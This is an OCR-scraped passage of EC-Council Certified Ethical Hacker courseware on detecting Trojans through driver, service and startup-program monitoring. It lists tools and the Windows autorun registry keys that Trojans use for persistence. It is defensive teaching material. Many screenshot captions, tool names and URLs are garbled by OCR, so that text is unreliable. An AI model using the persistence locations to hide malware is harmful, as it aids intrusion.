  • 139. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker 35 DriverView Fite a Edit 0 View ^ !‫ע‬ Options Help $ Driver Name * ATMFD.DLL Address 000C000000B69000 Size 0x00060000 Load... 2 Index 125 124 File Type Driver Description Windows NT OpenType/Type 1 ... Version 5.1.2.234 Company Adobe System... End A... O O O O 'O O O O O .. * cdd.dll O O O O O 8FFO O OOOOO O 0x00036000 1 Display Criver Canonical Display Driver 6.2.8400.0 Microsoft Corp... 00000000 0.. = * TSDDD.dll 00000000 00709000 O O O O 'O l62000 OCOO O 0x00009000 0x003ed000 1 5 123 Display Criver System Criver Framebuffer Display Driver 6.2.8400.0 Microsoft Corp... O O O O 'O O O O O .. 11 2 Multi-User Win32 Driver 6.2.8400.0 Microsoft Corp... O O O O 'O O O O O ., O O O O 'l69F3000 OCOO OO O b O x O OO O 1 153 System Criver Pass thru parser 6.2.8400.0 Microsoft Corp... 000000001.. ^ vhdparser.sys 00000000169E9000 OO O a O x O OO O 1 149 System Criver Native VHD parser 6.2.8400.0 Microsoft Corp... 000000001.. ^ asyncmac.sys O O O O '1 9D 00 OCOO6 D 0 OO O c O x O OO O 1 Network Driver MS Remote Access serial networ... 6.2.8400.0 Microsoft Corp... 000000001.. * WPRO_41_2001.sys O O O O 'l69D1000 OCOO ♦ srv.sys O O O O 'l6933000 OCOO OO O c O x O OO O 0x0009e O OO 1 1 Unknown Network Driver Server driver 6.2.8400.0 000000001.. Microsoft Corp... 000000001.. ‫ י‬srv2.sys • O O O O 'l6896000 OCOO 0x0009d000 1 148 147 11 -6 145 Network Driver Smb 2.0 Server driver 6.2.8400.0 Microsoft Corp... 000000001.. ^ vhdmp.sys O O O O 'l6812000 OCOO 0x00080000 1 11 5 System Criver VHD Miniport Driver 6.2.8400.0 Microsoft Corp... 000000001.. # FsDepends.sys O O O O '1 O C O O 6800000 0x00012000 2 150 System Criver File System Dependency Manag... 6.2.8400.0 Microsoft Corp... 000000001.. ^ tcpipreg.sys ® srvnet.sys O O O O '1 FE3 0 O C O O 5 00 0x00012000 1 142 Application TCP/IP Registry Compatibility D... 6.2.8400.0 Microsoft Corp... 000000001.. O O O O '1 F9 0 O C O O 5 F0 0 0x00044000 3 11 4 Network Driver Server Network driver 6.2.8400.0 Microsoft Corp... 000000001.. £ secdrv.SYS O O O O '1 F9 00 OCOO5 4 0 OO O b O x O OO O 1 140 System Criver Macrovision SECURITY Driver 4.3.86.0 Macrovision C... ♦ rdpdr.sys O O O O '1 F6 00 OCOO5 3 0 0x00031000 1 139 Driver Microsoft RDP Device redirector 6.2.8400.0 Microsoft Corp... 000000001.. ^ npf.sys ‫ י1י‬NiProbeMem.SYS OO O c O x O OO O O O O fO O xOO O 1 1 137 136 CACE Technol... Network Instru... 0x0002f000 1 * HTTP.sys O O O O 'l5E38000 OCOO OO O O x O elO O 1 135 134 System Criver System Criver Unknown npf.sys (NT5/6 AMD64) Kernel D... 4.1.0.2001 NiProbeMem for Observer Devic... 16.0.8.0 ^ WinVDEdrv6.sys O O O O '1 F5 00 OCOO5 7 0 O O O O '1 F4 00 OCOO5 8 0 O O O O 'l5F19000 OCOO System Criver Microsoft Corp... 000000001.. O O O O 'l5 D O O C O O EO O O OO O b O x O OO O 1 154 System Criver HTTP Protocol Stack lun parser 6.2.8400.0 ♦ lunparser.sys 6.2.8400.0 Microsoft Corp... 000000001.. • condrv.sys O O O O 'l5E00000 OCOO OO O d O x O OO O 1 143 System Criver Console Driver 6.2.8400.0 Microsoft Corp... 000000001.. ^ storport.sys O O O O 'l5D9E000 OCOO 0x00054000 1 System Criver O O O O 'l5 5EO O OCOO D O O O O O 'l5D25000 OCOO 0x00040000 0x00039000 1 1 Microsoft Storage Port Driver Virtual Encryption Driver Lonohorn SMB 2.0 Redirector 6.2.8400.0 ♦ WinVDEdrv.sys ‫ ♦י‬mrxsmb20.svs 152 144 133 Microsoft Corp... 000000001.. NewSoftwares.... 000000001.. Microsoft Coro... (XXXXXXX) 1.. v ♦ win32k.sys passthruparser.sys Unknown Svstem Criver 000000001.. 000000001.. 000000001.. O O O O 'I.. OOOO 7.0.0.0 6.2.8400.0 155 item(s), 1 Selected FIGURE 6.56: DriverView Screenshot Module 06 Page 965 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 140. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Device D rivers M onitoring Tools i jnj ■ ^ DriverGuide Toolkit H h :/w weiv r o o ttp / w .r v es ft.c m Unknown Device Identifier ht :/w w hndo o tp / w .z a gu.c m (v y y Driver Reviver Driver Detective ht :/ww r /rh.c m tp / w.dies q o V , h :/w w r egidto lk.c m ttp / w .div r u e o it o DriverMax ht :/w w nvt es l.c m tp / w .inoaiv-o o CEH DriverScanner 1 _• ‫ו‬ BBB □ □‫ם‬ Driver Magician ht :/w w n lu.c m tp / w .uib e o Double Driver ht :/w w ozt r tp / w .boe.og M y Drivers ht :/w w hndo o tp / w .z a gu.c m DriverEasy ht :/w w r /r a ic n o tp / w .diemg ia .c m h :/w w r ees.c m ttp / w .div r ay o Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. D evice D riv ers M o n ito rin g Tools A few of the device driver monitoring tools that help in detecting Trojans are listed as follows: 0 Driver Detective available at http://www.drivershq.com 0 Unknown Device Identifier available at http://www.zhangduo.com 0 DriverGuide Toolkit available at http://www.driverguidetoolkit.com 0 DriverMax available at http://www.innovative-sol.com 0 Driver Magician available at http://www.drivermagician.com 0 Driver Reviver available at http://www.reviversoft.com 0 DriverScanner available at http://www.uniblue.com 0 Double Driver available at http://www.boozet.org 0 My Drivers available at http://www.zhangduo.com 0 DriverEasy available at http://www.drivereasv.com Module 06 Page 966 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 141. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker Scanning for Suspicious Windows Services Trojans spawn Windows services allow attackers remote control to the victim machine and pass malicious instructions Trojans rename their processes to look like a genuine Windows service in order to avoid detection Enterprise Service Manager DtaftvN**! *J <•■!‫׳‬ 0J £'<r,p‫׳‬r : Pie $*wrn(E... 1 r <m p1i.11 <Lccei Slap Run‫״‬ OJ WndOM Evrrr L03 0J CCM• £1»‫־‬ Kl OJ f uvl»‫־‬n 0 ocovffy Prcvi OJ fmcfen 0 ■cvivr R*w... OJ *re v ** Fart C«*1« 5a A/Wnjciia FtearhlnnFo •#'1c10:o‫״‬FT=$e!Mco 1 U i- ,‫ ״‬fw‫ ״‬n«1 1CTvTUB (Lceel <L00il... <l«el <L00J ... tlccsJ... <Lcc«l .. <Local... <| r r ‫׳‬J 0 comtM.<Jl ®-nvoierrro (?■(W fTfO.. IO [?**ndrSV I Him. Rim.. Stop vU p.. > Rum.. Slop. Rum.. R*‫י ״‬ L^_ ‫ם‬ Path C:W1 .. f f DVI VV C 1‫״‬ .VW tV /l CAV/1‫״‬ c m .. e:w1 a m ... rsv/• SwipTjpo Automatic M Automatic Automatic Manu5l Manual Automatic Manual Automatic 61l1m.hr I-M LC .4K 55E K 41 x A J Trojans employ rootkit techniques to manipulate HKEY_LOCAL_MACHINESystemCurrentControlSet Services registry keys to hide its processes V 1a 6/ r a Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. S c a n n in g fo r S u s p ic io u s W in d o w s S e rv ic e s w O n c e t h e T r o ja n s a re in s t a lle d o n W i n d o w s s e rv ic e s , it b e c o m e s easy f o r an a t t a c k e r t o o p e r a t e t h e s y s te m f r o m a r e m o t e l o c a tio n . T r o ja n s a lso c r e a te t h e i r p ro ce s se s t o lo o k like g e n u i n e W i n d o w s se rv ic e s in o r d e r t o a v o i d d e t e c t i o n . W i t h t h e h e lp o f W i n d o w s se rvice s m o n i t o r i n g to o ls , y o u can d e t e c t t h e T ro ja n s . T r o ja n s t h a t s p a w n W i n d o w s se rv ic e s a l l o w a t ta c k e r s r e m o t e c o n t r o l t o t h e t a r g e t m a c h in e a nd pass m a lic io u s in s t r u c t io n s . T ro ja n s r e n a m e t h e i r p ro c e s s e s t o l o o k like a g e n u i n e W i n d o w s s e rv ic e in o rd e r to a v o id d e te c tio n . T r o ja n s e m p lo y ro o tk it te c h n iq u e s to m a n ip u la t e HKEY_LOCAL_MACHINESystemCurrentControlSetServices registry keys t o h id e t h e i r p ro cesse s. M odule 06 Page 967 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 142. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker Enterprise Service Manager F ile V iew Action H elp S rvice T e e yp ‫ •יי‬R g la e u r C D rive rs D la N m isp y a e C R fre e sh A ll D scrip n e tio Select a workstation < Local Machin C m u r S tu P th o p te ta s a A S rtu T e ta p yp E n le A th n xte sib u e tica n @ s s m ... < tio ... % y te ro Local... S p to ... C W A i... M n a a u l U# E cryp g F S s m(E @ S s m ... < n tin ile y te ... % y te R Local... R n ... C W u n A i... A to a I --u m tic 1 <Local... R n ... C P u n A r... A to a u m tic 1 iy s 1 d !1 s t2 9 ft?W indow E nt L g s ve o C +E 0M ven S s m t y te p @ S s m ... < % y te R Local... R n ... C W u n A i... A to a u m tic @ m s.d co re ll,... < Local... R n ... C W u n A i... A to a u m tic Fn u ctio D n isco ry P vi... @ s s m ... < ve ro % y te ro Local... S p to ... C W A i... M n a a u l ft? F nction D u isco ry R so @ s s m ... < ve e ... % y te ro Local... S p to ... C W A i... M n a a u l Qkf W indow F n C ch S r... s ot a e e @ s s m ... <Local... R n ... C W % y te ro u n A i... A to a u m tic d# W indow P se ta n F ... @ S s m ... <Local... S p s re n tio o % y te R to ... C W A i... M n a a u l M so F P S rvice icro ft T e R r n i in P n lir it P lip n r 1 9 S rvice S e s @ w d V <Local... R n ... C W % in ir% .. u n A i... A to a u m tic ✓n r ^ l 1 R 1in n A 1tf n m s lir r w ! 1 C m u r(s o p te ) A m istra r d in to W -M S L K K 1 IN S E C 4 4 V 1 /6 ■ ^ 0 /2 FIGURE 6.57: Scanning for Suspicious Windows Services M odule 06 Page 968 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 143. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker W i n d o w s S e r v i c e s M o n i t o r i n g T o o l: W in d o w s S e rv ic e M a n a g e r^ S rv M k n ) W in d o w s S e rv ic e M a n a g e r s im p lif ie s a ll c o m m o n ta s k s r e la te d t o W in d o w s s e r v ic e s . I t c a n c r e a te s e rv ic e s ( b o th W in 3 2 a n d L e g a c y D r iv e r) w i t h o u t r e s ta r t in g W in d o w s , d e le t e e x is tin g s e rv ic e s , a n d c h a n g e s e r v ic e c o n f ig u r a tio n © File Service Manage:‫־‬ View Service Irtcmol narrc Help Stole ■ P ^ D M S y s A ... stepped runring K w tunning .v>C5N5PD . stepped >*>CSM5PD.. runring C5Ndi5LVF stepped $ DcomLau.. runring defragsv‫׳‬c stepped 3 Dei/fceAi stepped | Dc/colro... stepped lunrino ‫ &־‬D fs runring 0 Dftc O DfsDiivoi runring DFSR runring fT)Df«r10 runring mnrino # Dhcp runring dijoocho tunring ^ disk stepped dmv*c Druoack© runring stepped 9 doOsvc runring & OPS Type Ci;plcy ra re Sta-ttype Win32 dnvei ?hared drive! drive! dnvet ?hared wr!32 thared *hared wn32 FS dav« CO N-► S^tenApofcabun Confole D n/« Cryptogiophic Servces CSN5HZTS82NDIS Ptyoca D«ver CSNEFDTSCac^ VOS Vetoed Dtv<* C$NdsLV»f HD1S Pwtcco D t^ f DCOM Server ^ c c e tt Laurchy Optimzc d i/e j Device Assaciakr! Serve• D cvcch ita l Servce nam d nanod 00(0 tyrterr :yjtem ivsterr auto nonod nanu^l FS driver wr>32 FS driver thared drvot drvoi drv*t tharod iliaed ,h « .d DFS Noi 1e:w-e DFS Nanetp-K* Chent L rv*■ DrS Name«pa~o $ o «1 Fllei 0 ‫ס׳יי‬ DFS Raplkalan DrS Flcplcabcr RcocC rf> Dtvct DHCP Cleri SyttonAtirbjto Cacto Disk Driver drvsc DNS Ciori WiedAutoConfg DiagrcRbc Poley Ser»c# nonod 0U0 tyckrr :‫חס*גץ‬ MilO bcc» *.to tyjkxx beet aeto rwnod *.«‫״‬ Executable ‫״‬ C:'‫׳‬Vin<lcwsJvs!em32dlho?texe /P tc c s s s id y ^ ^ ■ SystemG^dnversScondrv.sys C.Windcmiy«lem32'^vd10‫ ־‬exe -k jt Sjsten132Dr1vers>C5N5FDTS8Z syt J Sy3tem32Drivcr»'1CSNEFDTSS2<64. ays Ss1sem.32DriversC$NdsL'‫׳‬VF. sys C:VV1n<Sws?ystem32Uvcho«texe •k DcomL... C.'1Vindcvt5iy5len132'vjvch0jt exe •k defray. C‫־‬W1ndcwsiystefn32Vsvch!Mt exe •k Locals C:Windw*»yalerr02'14vcho»t cxo •k DoomL... C.windcv1sjvstem32ldfs5vc ew Sy««n132Df1vered1 tyf tc jy}terr02dr ivwsSdf*. *ys C Wmdewstj1«t«tvi?VDFSRi »xo SSy»iarr1cot''4/jtem32'‫«׳‬dtiver»Vd:«ro 4y« CAVAndCW^tern32SVChO« «<e •k Locals S)«flra32drivef«Vdboocko eyo SSyslmPMXVSyite1n32Sciiv‫׳‬er>dijk. jys 'Sys1arFeorSy8te1n32'1e»11/ersdmvJC sy* C:Windcvte#>ete1r132UvchMt e«0 ■k Melwor... CA'Windcw5iy5len132jV'ch0it exe •k LocolS.. CW1n<lcwsSysten»32tvcl‫ ־‬es-e •k Local £»st. v Rejlart seivice http://tools.sysprogs. org Copyright © by EG-Gouncil. All Rights Jteseivfed'.;Reproduction is Strictly Prohibited. W i n d o w s S e r v i c e s M o n i t o r i n g T o o l: W i n d o w s S e r v i c e M a n a g e r (S rv M an ) S o u rc e : h t t p : / / t o o l s . s y s p r o g s . o r g W i n d o w s S e rvice M a n a g e r is a t o o l t h a t a llo w s y o u t o s h o r t e n all p u b li c t a s k s lin k e d t o W i n d o w s se rvice s. T his can g e n e r a t e d i f f e r e n t se rv ic e s f o r W i n 3 2 a nd Legacy d r iv e r s w i t h o u t s h u t t i n g d o w n a n d r e s t a r t i n g W i n d o w s . It can also c a n c e l e x is t in g s e rvice s a n d m a n ip u la t e o t h e r c o n f i g u r a t i o n services. It has b o t h GUI a n d c c o m m a n d - l i n e m o d e s . It can also be u sed t o ru n a r b i t r a r y W i n 3 2 a p p li c a t i o n s as services. It s u p p o r t s all m o d e r n 3 2 - b i t a n d 6 4 - b i t v e r s io n s o f W in d o w s . M odule 06 Page 969 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 144. Ethical Hacking and Countermeasures Trojans and Backdoors File View Service Exam 312-50 C ertified Ethical Hacker Help Internal name State ,^)COMSysA... stopped condrv running $ CryptSvc lunning Type Win32 driver Start type Display name C0M+ System Application manual Executable C: Windowssystem32dllhost. exe /Processid.. Console Driver manual System32driverscondtv. sys shared Cryptographic Services auto A C:Windowssystem32svchost.exe • Networ... k V C S N 5 P 0 ... stopped diivei CSN5PDTS82 NDIS Protocol Driver system System32D riversCSN5PD TS82. sys ,>CSN5PD... lunning driver CSN5PDTS82x64 NDIS Protocol Driver system System32DriversCSN5PDTS82x64.sys ->CsNdisLWF stopped driver CsNdisLWF NDIS Protocol Driver system System32DriversCsNdisLWF.sys $ DcomLau... running shaied DCOM Server Process Launcher auto C:Windowssystem32svchost.exe •k DcomL.. Optimize drives Device Association Service manual C:Windowssystem32svchost.exe •k defiag... manual C:Windowssystem32svchost.exe •k LocalS... Device Install Service DFS Namespace manual C:Windowssystem32svchost.exe •k DcomL... defragsvc stopped Win32 DeviceAs... stopped shaied Devicelns... stopped running ■^>Dfs shaied lunning Win32 FS diivei DFS Namespace Client Driver auto system C: Windowssystem32df ssvc. exe O ^fsD river lunning FS diivei DFS Namespace Server Filter Driver system •fcDFSR lunning Win32 DFS Replication auto C: Windowssystem32D FSRs. exe ^)D IsrR o lunning FS diivei boot SystemRootsystem32d1iversdfsrro.sys $ Dhcp System32D river$dfsc. sys system32driversdfs. sys lunning shaied DFS Replication Readonly Driver DHCP Client auto C:Windowssystem32svchost.exe •k LocalS... ^ discache tunning driver System Attribute Cache system System32d1ive1sdiscache. sys i^ d is k tunning driver Disk Driver boot SystemR00tSystem32driversdisk.sys dmvsc stopped driver dmvsc manual SystemR00tSystem32driversdmvsc sys Dnscache running stopped shared shared DNS Client Wired AutoConfig auto manual lunning shared Diagnostic Policy Service auto C:Windowssystem32svchost.exe •k Networ C:Windowssystem32svchost.exe •k LocalS... C:W1ndowsSystem32Vsvchost exe •k Local.. 3 dot3svc £ DPS Properties... ] | Add service ] | Start service | Delete service_____________ ] V Restart service [__________________Exit FIGURE 6.58: Windows Service Manager (SrvMan) Tool Screenshot M odule 06 Page 970 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 145. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker Windows Services Monitoring Tools SMART Utility o AnVir Task Manager i h ttp ://w w w . thewindowsclub.com CEH http://w w w .anvW . com Netwrix Service Monitor Process Hacker h ttp ://w w w . netwrix.com h ttp://processhacker.sourceforge.net Vista Services Optimizer Free Windows Service Monitor Tool h ttp://w w w .sm artpcu tilities.com http://w w w .m anageengine.com ServiWin E h ttp ://w w w . nirsoft.net 5 5 Windows Service Manager Tray Overseer Network Monitor h ttp://w w w .overseer-netw ork-m onitor.com Total Network Monitor http://www.softin/enti/e.com http://w inservicem anager.codeplex.com Copyright © by f B EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. W in d o w s S e rv ic e s M o n ito r in g T o o ls W i n d o w s S e rvice s m o n i t o r i n g t o o l s m o n i t o r c r itic a l W i n d o w s s e rv ic e s a n d o p t i o n a l l y r e s t a r t t h e m a f t e r fa ilu r e . A f e w o f t h e W i n d o w s s e rv ic e m o n i t o r i n g t o o l s t h a t a re r e a d ily a v a ila b le in t h e m a r k e t a re lis te d as f o l lo w s : 0 S m a r t U t i l i t y a v a ila b le a t h t t p : / / w w w . t h e w i n d o w s c l u b . c o m 0 N e t w r i x S ervice M o n i t o r a v a ila b le a t h t t p : / / w w w . n e t w r i x . c o m 0 V ista Services O p t i m i z e r a v a ila b le a t h t t p : / / w w w . s m a r t p c u t i l i t i e s . c o m 0 S e r v iW in a v a ila b le a t h t t p : / / w w w . n i r s o f t . n e t 0 W i n d o w s S ervice M a n a g e r T ra y a v a ila b le a t h t t p : / / w i n s e r v i c e m a n a g e r . c o d e p l e x . c o m © A n V i r Task M a n a g e r a v a ila b le a t h t t p : / / w w w . a n v i r . c o m 0 Process H a c k e r a v a ila b le a t h t t p : / / p r o c e s s h a c k e r . s o u r c e f o r g e . n e t 0 Free W i n d o w s S ervice M o n i t o r T o o l a v a ila b le a t h t t p : / / w w w . m a n a g e e n g i n e . c o m 0 O v e r s e e r N e t w o r k M o n i t o r a v a ila b le a t h t t p : / / w w w . o v e r s e e r - n e t w o r k - m o n i t o r . c o m 0 T o ta l N e t w o r k M o n i t o r a v a ila b le a t h t t p : / / w w w . s o f t i n v e n t i v e . c o m M odule 06 Page 971 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 146. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker C EH Check start up program entries in the registry Details are covered in next slide Check start up folder C :ProgramDataMicrosoft WindowsStart MenuPrograms'^ Star tup C:Users(UserName)AppDataRoaming MicrosoftWindowsStart MenuPrograms'^ Star tup © Check W indows services automatic started Check device drivers automatically loaded G o to R un C:WindowsSystem32 drivers Type s e r v ic e s .m s c -> S o rt b y S t a r tu p T y p e Check boot, ini o bed (bootmgr) e t i s r nre Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. S c a n n in g fo r S u s p ic io u s S ta rtu p P r o g r a m s T ro ja n s , once in s t a lle d on th e c o m p u te r, s ta rt a u to m a tic a lly at sys te m s ta rtu p . T h e r e f o r e , s c a n n in g f o r s u s p ic io u s s t a r t u p p r o g r a m s is v e r y e s s e n tia l f o r d e t e c t i n g T ro ja n s . By f o l l o w i n g th e s e s im p le ste ps, y o u can i d e n t i f y if t h e r e a re a n y h id d e n T ro ja n s : Step 1: C h e ck t h e S t a r t u p f o l d e r C:ProgramDataMicrosoftWindowsStart MenuProgramsStartup C :Users (User-Name) AppDataRoamingMicrosoft:WindowsStart MenuProgramsStartup Step 2: C h e ck W i n d o w s s e rv ic e s a u t o m a t i c s ta r t e d Go t o Run, t y p e se rv ic e s .m s c , a n d clic k Sort by Startup Type Step 3: C he ck s t a r t u p p r o g r a m e n t r i e s in t h e r e g is t r y Step 4: C h e ck t h a t d e v ic e d r iv e r s a re a u t o m a t i c a l l y lo a d e d : C :WindowsSystem32drivers C h e ck boot.ini o r bed ( b o o t m g r ) e n t r i e s M odule 06 Page 972 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 147. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker Windows 8 Startup Registry Entries CEH (•rtifwd ithiul •UtkM HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerShell Folders, C g i i n Start.up onto Explorer Startup Setting HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerUser Shell Folders, Common Startup HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerShell Folders, Startup HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell Folders, Startup HKCUSoftwareMicrosoftWindows NTCurrentVersionWindows, load HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun Windows Startup Setting HKCUSoftwareMicrosoftWindowsCurrentVersionRun HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunOnce HKCUSoftwareMicrosoftWindowsCurrentVersionRunOnce HKCUSoftwareMicrosoftInternet ExplorerUrlSearchHooks IE Startup Setting HKLMSOFTWAREMicrosoftInternet ExplorerToolbar HKLMSOFTWAREMicrosoftMnternet ExplorerExtensions HKCUSOFTWAREMicrosoftInternet ExplorerMenuExt P r o g r a m s t h a t r u n o n W in d o w s s t a r t u p c a n b e lo c a te d in th e s e r e g is t r y e n t r ie s Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. W in d o w s 8 S ta rtu p R e g is try E n trie s P r o g r a m s t h a t ru n o n W i n d o w s s t a r t u p can be l o c a te d in th e s e r e g is t r y e n tr ie s : HKLMSOFTWAREMicrosoftwindowsCurrentversionExplorerShell Folders, Common startup Explorer Startup Setting HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerUser Shell Folders, Common Startup HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerShel1 Folders, Startup HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell Folders, Startup HKCUSoftwareMicrosoftWindows NTCurrentVerslonWindows, load HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun Windows Startup Setting HKCUSoftwareMicrosoftWindowsCurrentVersionRun HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunOnce HKCUSoftwareMicrosoftWindowsCurrentVersionRunOnce HKCUSoftwareMicrosoftInternet ExplorerUrlSearchHook3 IE Startup Setting HKLMS0FTWAREMicro3oftInternet ExplorerToolbar HKLMSOFTWAREMicrosoftMnternet ExplorerExtensions HKCUSOFTWAREMicrosoftInternet ExplorerMenuExt FIGURE 6 .5 9 : W in d o w s 8 S ta rtu p R e g istry E n trie s M odule 06 Page 973 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 148. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker Startup Programs Monitoring Tool: Starter CEH Starter is a startup manager for Microsoft Windows It allows you to view and manage all the programs that are starting automatically whenever OS is loading 1 ‫ .ם‬x ‫־‬ SatrSre40 tre(evr.) Fe Et Cfgit n Hl i d c.uao ep l i n a □ 0 3 ♦ a a e Et :r Rfs 1 Luc Ppts Cbn Act d ] * erh anh rei poi bu i r- J ore ‫"־״‬ ra ^ Processes | ections S B tf % All sections (18) 1 jU Startup folden(l) Current user g i Allu1*»<1) £*‫ ־‬Default user J0 Regiiby (17) & Current user (7) J# Run (6 1 M RunOnce (I) 3 l i Alluwu(IO) H Run (9] j$ RunOnce 3 RunOnceE... H RunServicei 3 RunServic*.. 9 t? Drfaultuser 3 Run 3 RunOnc* I 3 1N1 files /72m Seivi Vaie (3 t f APC (3 < f APC a Driver Detective (3 dtii.exe 0 & ElcomSoftDPR (3 £ ) EMET Notifiar [7] f> EPSON UD STARE * □ i r FlBacleup 9009lataH i (3 GTWhois •St rronimgr (3 1nS.na [ 3 U I Sn:gi: 1 .Ink 0 [3 ivcnM 0 Title (3 Unin-taII C:Uvc , a r a WinFLTray (3 Eratt.. ^ M a w S iB a-User Run B■ Registry CProgram Files «36.Ad.a‫־׳‬ce: Parenal Control B_ GJ>rog1am Filet U361M . anced Pa‫׳‬cnul Contf0lB_ CAProgram Fie* (r36)PC Dwen MeadOujrtcn' D‫״‬v . 'C:Progfam Fi*t U96&Auto‫־‬Tr*J.*»'dULw•' C:Progr«m Etles (r96JEkom^ctT Password Recovery.. C:Prog1am FS« u & '.EVfT.EMfT nctifie‫■« ״‬ * ‘CAPtogram f i n (4t*IPSO N P.c|«torlPSON US . C^Program Files (rt6)'.NewvScftware tf eider Lodcsf C:VProq‫׳‬am Edet Tarfk'googlet . GProgram Files (x36'.GecfcT00*1'GTYh0tJcxe ' C:VP1cg>wn F4n Udbi^WmdoMi lA«)<lnMn9«n1n . 'C:Ptogram f i n lack«VnSW OVProgram Files 6tW)Tc<ftSmi*Sn1 gll '>S^agic3_ C:W1ndcM1VncM<A1v<n1t2 n» UnHackMe Roeebt Check CWind0M 4Uy£t*mi?.cmd.M ‫׳‬q/c tmdf /t/q 'C CAW1n<JowsSy5Wow6AWmFl Imy e» (6,orG^ 1jGg'oi 9'ol,or Registry -Machine Run Rejpstry ‫ ־‬User Run Registry •Machine Run Reysfty ‫ ־‬User Run Reystry •Machine Run Re^tby ‫ ־‬Machine Run Rcgisoy User Run Retptby •Machine Run Re^ so Machi ne Run ry Ray *by -Utw Run Re^tby •Machine Run Startup AD Users Reiptby •Machin* Run Regiioy Machine Run-. Registry •User RunOnce Reysoy ‫ ־‬User Run D«c!p!bn lil) Yes fed v«s ₪Vi e bd Vts ₪ Yd Elcomsoft Distributed Passwc EMET Notifiei (Enhanced Mit! EPSON USB Ditplsy VI M [EP'J bd Y S (Folder Lock) C 0 V ‫ ״‬Google Talk b v« d Rv ‫״‬ lid Yes 0V ‫״‬ I d Ye s Window* l ‫׳‬v« M«k»«nyar Snegh bd Ve: hd V« 0 Vn 5 Wm m AoeedtnA!0btaae/ AoeedrnArbt aaeA> db Rsead c aMngr 1.6.S.0/ dbRaeadcoaMngrd —ms—iia —2^2!—*2s!— laamuuhttp://codestuff.tripod, com Copyright © by r EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. S t a r t u p P r o g r a m s M o n i t o r i n g T o o l: S t a r t e r S o u rc e : h t t p : / / c o d e s t u f f . t r i p o d . c o m S t a r t e r a llo w s y o u t o v i e w a n d m a n a g e all t h e p r o g r a m s t h a t s t a r t a u t o m a t i c a l l y w h e n e v e r t h e o p e r a t i n g s y s te m is lo a d e d . It e n u m e r a t e s all t h e h i d d e n r e g i s t r y e n t r i e s , s t a r t u p f o l d e r s ' it e m s a n d s o m e o f t h e in i t i a li z a t i o n files, so t h a t t h e u s e r c o u ld choose to te m p o ra rily d is a b le s e le c te d e n tr ie s , e d i t t h e m , c r e a t e n e w , o r d e l e t e t h e m p e r m a n e n t l y . S t a r t e r can also list all t h e p ro c e s s e s r u n n i n g a n d w i t h a c h a n g e t o v i e w e x t e n d e d p ro c e s s ' i n f o r m a t i o n (such as used DLLs, m e m o r y usage, t h r e a d c o u n t , p r i o r i t i e s , etc.), a n d t o t e r m i n a t e s e le c te d pro ces s. It s u p p o r t s M i c r o s o f t W i n d o w s 9x, M e , NT, 2 0 0 0 , XP, 2 0 0 3 , a n d V ista . T h e r e a re no s p e c ific re q u ire m e n ts except one: r e g is t r y o p e ra tio n s on a W in d o w s - N T - b a s e d o p e r a t i n g s y s te m m a y r e q u i r e sp e cia l access r ig h ts . As a ru le , m e m b e r s o f A d m i n i s t r a t o r s and P o w e r U sers g r o u p s h a v e n o t h i n g t o w o r r y a b o u t . M odule 06 Page 974 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
